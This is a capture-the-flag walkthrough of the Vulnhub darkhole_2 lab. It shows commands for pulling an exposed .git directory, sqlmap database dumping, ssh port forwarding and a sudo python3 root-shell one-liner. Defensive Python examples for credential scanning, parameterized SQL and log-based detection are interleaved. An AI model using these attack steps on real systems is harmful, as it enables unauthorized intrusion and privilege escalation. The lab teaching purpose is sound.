Vulnhub's darkhole_ two
2022-07-05 18:13:00 【Plum_Flowers_seven】
Catalog
One, Host discovery
Two, Port scanning
Three, Service version discovery
Four, Information gathering
Five, .git
Six, sqlmap injection
Seven, ssh login
Eight, Port forwarding
Nine, losy information gathering
Ten, sudo privilege escalation
Eleven, hydra brute force
One, Host discovery
Two, Port scanning
Three, Service version discovery
What is worth noting here is .git: the source code has been put up along with the site. The rest is as usual.
Four, Information gathering
1. Home page
A picture on the home page; there is nothing in the source code.
There is a login interface.
2. Directory scan
Most of the useful information points to .git, which matches what we collected above.
Five, .git
Note: it is best to use the 2021 version of Kali; on the latest 2022 version git clone reports an error, I don't know why.
1. Download .git
wget -r http://192.168.0.108/.git/
2. View version history
3. Generate the latest version of source code
git clone . backup
In the login php file of the source code we can see that the input parameters are escaped here to prevent injection.
4. Check the vulnerable version
Here, when switching branches, sometimes you have to run this first
git stash
Switch branch
git checkout a4d900a8d85e8938d3601f3cef113ee293028e10
Looking inside, we got the account password used in the previous version. It is likely that the previous version's account password still works for logging in to this version.
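An added example, not code from the original article or the box: a small Python scanner in the spirit of the step above. It walks `git log -p` output and flags added lines that look like hard-coded credentials, which is the check a project should run before publishing a repository, because an old commit keeps the password even after a later commit removes it from the current version. The log excerpt, the file contents, the second commit hash and the `scan_repo` helper are constructed for illustration; only the first hash comes from the article.

```python
import re
import subprocess

# Constructed excerpt in the shape of `git log -p` output. The commit messages, file
# contents and the second hash are made up; only the first hash appears in the article.
SAMPLE_LOG = """\
commit a4d900a8d85e8938d3601f3cef113ee293028e10
Author: dev <dev@example.invalid>

    add login page

diff --git a/login.php b/login.php
--- /dev/null
+++ b/login.php
@@ -0,0 +1,3 @@
+<?php
+$email = "admin@example.invalid";
+$password = "CONSTRUCTED_PASSWORD";

commit 1111111111111111111111111111111111111111
Author: dev <dev@example.invalid>

    move credentials to the database

diff --git a/login.php b/login.php
--- a/login.php
+++ b/login.php
@@ -1,3 +1,2 @@
 <?php
-$email = "admin@example.invalid";
-$password = "CONSTRUCTED_PASSWORD";
+$stmt = $pdo->prepare("SELECT * FROM users WHERE email = ?");
"""

# keyword, optional whitespace, '=' or ':', optional quote, then the value
CRED_RE = re.compile(
    r"(?i)\b(password|passwd|pass|secret|token|api[_-]?key)\b\s*[=:]\s*[\"']?([^\"'\s;]+)")


def find_credential_leaks(log_text):
    """Walk `git log -p` text and report added lines that look like hard-coded secrets.

    Only '+' lines are inspected: a secret that was added in any commit stays
    recoverable from history, even if a later commit removed it again.
    Returns (short hash, path, keyword, value) tuples.
    """
    findings = []
    commit = path = None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1][:7]
        elif line.startswith("+++ "):
            path = line[4:]
            if path.startswith("b/"):
                path = path[2:]
        elif line.startswith("+") and not line.startswith("+++"):
            m = CRED_RE.search(line[1:])
            if m:
                findings.append((commit, path, m.group(1), m.group(2)))
    return findings


def scan_repo(repo_dir):
    """Run the same scan over a real repository's full history (all branches)."""
    log = subprocess.run(["git", "-C", repo_dir, "log", "-p", "--all"],
                         capture_output=True, text=True, check=True).stdout
    return find_credential_leaks(log)


if __name__ == "__main__":
    for hit in find_credential_leaks(SAMPLE_LOG):
        print("commit %s %s: %s = %s" % hit)
```

The second commit in the sample removes the password, yet the scanner still reports it from the first commit, which is exactly why a published .git directory is as bad as publishing the credentials themselves.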
5. Log in
Six, sqlmap injection
1' gives no echo.
1'and+1=1--+ gives the same output as 1.
This proves that SQL injection exists; run sqlmap.
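An added example, not code from the box or the article, showing why the login page's escaping noted earlier holds while this parameter does not. Using Python's sqlite3 and a constructed users table, `lookup_vulnerable` splices the value into the SQL text (the two symptoms above, no echo on `1'` and identical output for `1' and 1=1-- `, fall out of it), `lookup_escaped` doubles single quotes the way the login page's escaping does, and `lookup_safe` binds the value as a parameter. The table, names and values are made up.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table (not the box's real darkhole_2 data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "CONSTRUCTED_PW_1"), (2, "bob", "CONSTRUCTED_PW_2")])
    return conn


def lookup_vulnerable(conn, user_id):
    """User input is spliced into the SQL text, so the database parses it as SQL.

    Returns None when the statement fails to parse, which is the 'no echo'
    symptom the write-up sees for a lone quote.
    """
    sql = "SELECT username FROM users WHERE id='" + user_id + "'"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error:
        return None


def lookup_escaped(conn, user_id):
    """Quote escaping, as the login page does: a quote inside the value becomes ''.

    Fine for a quoted string literal, but it only protects this one quoting
    context; it is not a substitute for parameters.
    """
    sql = "SELECT username FROM users WHERE id='" + user_id.replace("'", "''") + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, user_id):
    """Bound parameter: the value is data and can never change the SQL grammar."""
    rows = conn.execute("SELECT username FROM users WHERE id=?", (user_id,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1'", "1' and 1=1-- "):
        print(repr(probe), lookup_vulnerable(db, probe),
              lookup_escaped(db, probe), lookup_safe(db, probe))
```

With the vulnerable query, `1'` breaks the statement and `1' and 1=1-- ` returns the same row as `1` because the appended condition is evaluated as SQL; both hardened versions treat the whole string as a value and return nothing for it.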
Capture the request with burp,
(1) Enumerate the databases
sqlmap -r ~/Desktop/1 --dbs
Four default databases, plus one named darkhole_2
(2) Enumerate the tables
(3) Dump them
ssh:
users:
Seven, ssh login
1. Got a shell as jehad.
During information gathering we saw that .bash_history contains many hints. The hint here is to set up a port forward and then execute the command.
2. Port 9999 service information
Content:
ps -aux | grep 9999
You can see that the program runs as losy; we use it to execute a reverse shell and then get a shell as losy.
Eight, Port forwarding
Why do this port forwarding? Because from our Kali client we cannot reach the service script deployed on port 9999 of the target.
Here 127.0.0.1 is the address of the target (the remote end).
Of course, we could in fact just use the jehad user we obtained and execute the commands locally.
1. Kali side
ssh -L 9633:127.0.0.1:9999 [email protected]
After the port forward is up, we can carry out the command execution from the Kali side.
2. Reverse shell
.bash_history actually provides us with several reverse shell approaches; they are the ways attackers have tried to get in, but none of them seem to work.
URL-encode the payload:
Submitted successfully and the shell came back.
Nine, losy information gathering
Upgrade the shell; the password was already given to us.
Ten, sudo privilege escalation
Use the python one-liner given above
sudo python3 -c 'import os; os.system("/bin/sh")'
Eleven, hydra brute force
lama has too much privilege and too simple a password.
Log in and use sudo to escalate.
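An added example from the detection side, not part of the original write-up: a Python script that reads syslog-style auth log lines and flags the two events this box ends with, a run of failed ssh logins from one source (what a hydra run looks like to the server) and a sudo invocation of an interpreter such as python3 that can hand out a root shell. The log excerpt, hostname, source IPs and timestamps are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log excerpt: hostname, IPs and times are made up for this example.
SAMPLE_AUTH_LOG = """\
Jul  5 18:01:01 darkhole sshd[1201]: Failed password for lama from 192.168.0.50 port 50001 ssh2
Jul  5 18:01:02 darkhole sshd[1202]: Failed password for lama from 192.168.0.50 port 50002 ssh2
Jul  5 18:01:03 darkhole sshd[1203]: Failed password for lama from 192.168.0.50 port 50003 ssh2
Jul  5 18:01:04 darkhole sshd[1204]: Failed password for lama from 192.168.0.50 port 50004 ssh2
Jul  5 18:01:05 darkhole sshd[1205]: Failed password for lama from 192.168.0.50 port 50005 ssh2
Jul  5 18:01:06 darkhole sshd[1206]: Failed password for lama from 192.168.0.50 port 50006 ssh2
Jul  5 18:01:07 darkhole sshd[1207]: Accepted password for lama from 192.168.0.50 port 50007 ssh2
Jul  5 18:03:00 darkhole sshd[1300]: Failed password for jehad from 192.168.0.60 port 50100 ssh2
Jul  5 18:05:00 darkhole sudo:     losy : TTY=pts/0 ; PWD=/home/losy ; USER=root ; COMMAND=/usr/bin/python3 -c import os; os.system("/bin/sh")
Jul  5 18:06:00 darkhole sudo:    admin : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/apt update
"""

SSH_FAIL_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)")
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")
# binaries that can spawn a shell when run under sudo (python3, python3.8, bash, vim ...)
INTERPRETER_RE = re.compile(r"^(python[\d.]*|perl|ruby|sh|bash|dash|zsh|vim?|less|awk)$")


def _parse_ts(ts):
    # syslog timestamps carry no year; the 1900 default is fine for comparing within a window
    return datetime.strptime(ts, "%b %d %H:%M:%S")


def detect_ssh_brute_force(log_text, threshold=5, window_seconds=60):
    """Return (source, user, total failures) for every source/user pair that had
    `threshold` failed logins inside any `window_seconds` span."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        m = SSH_FAIL_RE.match(line)
        if m:
            failures[(m["src"], m["user"])].append(_parse_ts(m["ts"]))
    alerts = []
    for (src, user), times in failures.items():
        times.sort()
        # sliding window over the sorted failure times
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window_seconds:
                alerts.append((src, user, len(times)))
                break
    return alerts


def detect_sudo_interpreters(log_text):
    """Return (user, target user, binary) for sudo runs of shell-capable interpreters."""
    alerts = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if not m:
            continue
        binary = m["cmd"].split()[0].rsplit("/", 1)[-1]
        if INTERPRETER_RE.match(binary):
            alerts.append((m["user"], m["target"], binary))
    return alerts


if __name__ == "__main__":
    print("brute force:", detect_ssh_brute_force(SAMPLE_AUTH_LOG))
    print("sudo interpreters:", detect_sudo_interpreters(SAMPLE_AUTH_LOG))
```

The brute-force rule fires on the six failures for lama from one source inside a few seconds but not on the single failure for jehad; the sudo rule fires on the python3 one-liner and ignores the apt run. The same rules also point at the fixes: lock out or rate-limit repeated ssh failures, and keep interpreters and editors out of sudoers rules.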